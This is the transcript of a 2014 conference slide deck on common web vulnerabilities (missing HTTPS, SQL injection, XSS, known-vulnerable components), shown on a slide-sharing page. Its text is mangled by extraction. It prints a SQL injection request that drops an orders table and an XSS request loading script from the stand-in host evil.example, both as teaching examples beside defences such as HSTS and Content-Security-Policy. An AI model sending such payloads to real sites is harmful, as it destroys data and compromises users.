Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
There Is No Silver Bullet
Search
Harley Watson
November 29, 2014
Programming
0
900
There Is No Silver Bullet
Harley Watson
November 29, 2014
Tweet
Share
More Decks by Harley Watson
See All by Harley Watson
paper tickets > smartcards, probably.
unlobito
0
7.6k
one, two step
unlobito
0
760
What's in your pocket? (BSides Manchester)
unlobito
0
970
sorry, we're cash only. (securi-tay)
unlobito
1
1.1k
Sorry, we're cash only. (hacksoc)
unlobito
0
100
There Is No Silver Bullet (Español)
unlobito
0
160
Other Decks in Programming
See All in Programming
TypeScriptでDXを上げろ! Hono編
yusukebe
3
670
GPUを計算資源として使おう!
primenumber
1
200
Claude Code + Container Use と Cursor で作る ローカル並列開発環境のススメ / ccc local dev
kaelaela
12
6.8k
「テストは愚直&&網羅的に書くほどよい」という誤解 / Test Smarter, Not Harder
munetoshi
0
190
Webの外へ飛び出せ NativePHPが切り拓くPHPの未来
takuyakatsusa
2
580
はじめてのWeb API体験 ー 飲食店検索アプリを作ろうー
akinko_0915
0
130
ニーリーにおけるプロダクトエンジニア
nealle
0
890
なぜ「共通化」を考え、失敗を繰り返すのか
rinchoku
1
670
Advanced Micro Frontends: Multi Version/ Framework Scenarios @WAD 2025, Berlin
manfredsteyer
PRO
0
370
Google Agent Development Kit でLINE Botを作ってみた
ymd65536
2
260
ソフトウェア品質を数字で捉える技術。事業成長を支えるシステム品質の マネジメント
takuya542
2
14k
#kanrk08 / 公開版 PicoRubyとマイコンでの自作トレーニング計測装置を用いたワークアウトの理想と現実
bash0c7
1
900
Featured
See All Featured
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
47
9.6k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
161
15k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
PRO
181
54k
Bootstrapping a Software Product
garrettdimon
PRO
307
110k
Mobile First: as difficult as doing things right
swwweet
223
9.7k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
108
19k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
251
21k
KATA
mclloyd
30
14k
Testing 201, or: Great Expectations
jmmastey
43
7.6k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
34
3.1k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
44
2.4k
The Language of Interfaces
destraynor
158
25k
Transcript
there is no silver bullet Henri Watson
Which vulnerabili.es commonly affect web applica.ons in the
Dominican Republic?
No HTTPS
Using HTTPS won’t cost you an arm and a
leg.
The current proposal for HTTP/2.0 requires TLS.
If you decide to use HTTPS, also use Strict-‐Transport-‐Security
and ssllabs.com/ssltest
SQL Injec.ons
GET /tracker?order=12345”; DROP TABLE orders;-‐-‐ SELECT * FROM
orders WHERE order = “12345”; DROP TABLE orders;-‐-‐” AND status = “pending” Request from the client to the server Request from the webserver to the database
None
None
None
Authen.ca.on Implementa.on Mistakes
None
None
Cross-‐Site Scrip.ng (XSS)
GET /hi?name=<script src=“hep://evil.example/ l33thax.js”></script> Hello, <script src=“hep://evil.example/ l33thax.js”></script>!
Request from the client to the server Reply from the server to the client
Content-‐Security-‐Policy
Exposure of Sensi.ve Data
None
Using Components With Known Vulnerabili.es
Mailing Lists • bugtraq hep://www.securityfocus.com/archive/1 • debian-‐security-‐announce
heps://lists.debian.org/debian-‐security-‐announce/ • fulldisclosure hep://nmap.org/mailman/lis.nfo/fulldisclosure
Mailing Lists •
[email protected]
heps://hepd.apache.org/lists.html#hep-‐announce • nginx-‐announce
hep://mailman.nginx.org/mailman/lis.nfo/nginx-‐ announce • php-‐announce hep://php.net/mailing-‐lists.php
None
Customer Service
None
Why is there no “silver bullet”?
Informa.on security is a constant investment.
Heartbleed
By placing your users’ informa.on at risk, you also
risk ruining your company’s reputa.on.
Thanks! @henriwatson
[email protected]
heps://henriwatson.com/talks/silverbullet